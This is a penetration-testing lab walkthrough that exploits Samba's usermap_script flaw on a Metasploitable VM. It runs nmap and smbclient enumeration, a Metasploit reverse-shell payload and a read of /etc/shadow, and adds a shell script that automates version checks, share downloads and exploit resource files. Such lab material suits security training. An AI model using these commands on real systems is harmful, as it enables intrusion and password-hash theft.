Every week we share techniques and tools for attacking the services most commonly used by companies around the world, such as Apache, MySQL and PostgreSQL. In this episode, Gianni turns his attention to Samba. After a short introduction on finding all the computers that expose shares, he shows how to get the NetBIOS name of a host, list the shares available on it, download files from a share, and exploit vulnerable Samba instances.

Tools, Scripts, and Exploits

Steps

  • Identify all the computers that have open shares (this scans only the NetBIOS session port, 139/tcp; Samba also listens on 445/tcp, so add it to -p to catch hosts that expose SMB on 445 alone)
    • nmap -v -sV 192.168.75.0/24 -p 139
  • Get the Netbios name of the target machine
    • nmblookup -A 192.168.75.149
  • Get the list of shares available on the target machine (-N skips the password prompt, so this is a null-session listing)
    • smbclient -L \\METASPLOITABLE -I 192.168.75.149 -N
  • Inspect the tmp share
    • smbclient //METASPLOITABLE/tmp -I 192.168.75.149 -N
    • dir
    • cd .ICE-unix
    • dir
    • cd ..
    • cd .X11-unix
    • dir
    • exit
  • Use Metasploit's usermap_script module to get code execution (the "username map script" flaw, CVE-2007-2447, affects Samba 3.0.20 through 3.0.25rc3; the version reported in the smbclient banner tells you whether the target is in range)
    • msfconsole
    • use exploit/multi/samba/usermap_script
    • show options
    • set RHOST 192.168.75.149 (current Metasploit releases name this option RHOSTS)
    • show payloads
    • set PAYLOAD cmd/unix/reverse
    • show options
    • /sbin/ifconfig (run from inside msfconsole to find the attacker's own address for LHOST)
    • set LHOST 192.168.75.146
    • exploit
  • Get root (the shell returned by the payload runs as the Samba daemon's user, which on this target is root, so /etc/shadow is readable without any privilege escalation)
    • whoami
    • cat /etc/shadow
  • Game over!
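As an added example that is not part of the episode, the script below wraps the enumeration steps above into a few shell functions: it pulls the hosts with 139/tcp open out of nmap output, pulls the Disk shares and the exact Samba version out of an `smbclient -L` listing, checks whether that version falls in the range hit by usermap_script, and emits a Metasploit resource script that replays the module steps. The nmap and smbclient outputs embedded in it are constructed samples shaped like Metasploitable output, not captures from the video; the attacker address 192.168.75.146 is taken from the steps above, and `fetch_share` is a hypothetical helper that needs a real smbclient and target to do anything.

```shell
#!/bin/sh
# Added example (not from the episode): offline helpers around the tools used
# in the steps above. Sample outputs are constructed, not real captures.

# Constructed sample of `nmap -v -sV 192.168.75.0/24 -p 139` (normal output).
NMAP_SAMPLE='Nmap scan report for 192.168.75.1
Host is up (0.00021s latency).
PORT    STATE  SERVICE     VERSION
139/tcp closed netbios-ssn

Nmap scan report for 192.168.75.149
Host is up (0.00033s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)'

# Constructed sample of `smbclient -L \\METASPLOITABLE -I 192.168.75.149 -N`.
SMBCLIENT_SAMPLE='Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))'

# hosts_with_open_139 NMAP_OUTPUT: print each IP whose 139/tcp is open.
hosts_with_open_139() {
    printf '%s\n' "$1" | awk '
        /^Nmap scan report for/ { host = $NF; gsub(/[()]/, "", host) }
        /^139\/tcp +open/       { print host }'
}

# list_disk_shares SMBCLIENT_OUTPUT: names of Disk shares, one per line.
list_disk_shares() {
    printf '%s\n' "$1" | awk '$2 == "Disk" { print $1 }'
}

# samba_version SMBCLIENT_OUTPUT: version from the Server=[Samba ...] banner.
samba_version() {
    printf '%s\n' "$1" | sed -n 's/.*Server=\[Samba \([^]]*\)\].*/\1/p'
}

# samba_usermap_vulnerable VERSION: exit 0 when VERSION is in the range hit by
# the username map script flaw (3.0.20 up to and including 3.0.25rc3).
samba_usermap_vulnerable() {
    parsed=$(printf '%s\n' "$1" |
        sed -n 's/^\([0-9][0-9]*\)\.\([0-9][0-9]*\)\.\([0-9][0-9]*\)\(rc[0-9]*\)\{0,1\}.*/\1 \2 \3 \4/p')
    [ -n "$parsed" ] || return 1
    set -- $parsed          # $1=major $2=minor $3=patch $4=rc suffix (may be empty)
    [ "$1" -eq 3 ] && [ "$2" -eq 0 ] || return 1
    if [ "$3" -ge 20 ] && [ "$3" -le 24 ]; then return 0; fi
    if [ "$3" -eq 25 ] && [ -n "$4" ]; then return 0; fi   # 3.0.25rcN only
    return 1
}

# fetch_share HOST SHARE: hypothetical helper, needs a real smbclient and target.
# Recursively downloads everything readable from an anonymous share into the
# current directory (prompt off stops mget asking per file).
fetch_share() {
    smbclient "//$1/$2" -I "$1" -N -c 'prompt off; recurse on; mget *'
}

# msf_resource RHOST LHOST: resource script replaying the module steps above;
# run it with `msfconsole -r usermap.rc`. Newer Metasploit names RHOST RHOSTS.
msf_resource() {
    cat <<EOF
use exploit/multi/samba/usermap_script
set RHOST $1
set PAYLOAD cmd/unix/reverse
set LHOST $2
exploit
EOF
}

# Tie the pieces together on the constructed samples. With real tools, replace
# the samples with "$(nmap ...)" and "$(smbclient -L ...)" output per host.
for host in $(hosts_with_open_139 "$NMAP_SAMPLE"); do
    version=$(samba_version "$SMBCLIENT_SAMPLE")
    echo "$host: Samba $version; disk shares: $(list_disk_shares "$SMBCLIENT_SAMPLE" | tr '\n' ' ')"
    if samba_usermap_vulnerable "$version"; then
        echo "$host looks vulnerable to usermap_script; resource script:"
        msf_resource "$host" 192.168.75.146
    fi
done
```

The version check is the part worth keeping even if you drive Metasploit by hand: the nmap -sV banner only says "3.X - 4.X", while the `Server=[Samba ...]` line from a null-session `smbclient -L` gives the exact release, which is what decides whether usermap_script applies.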
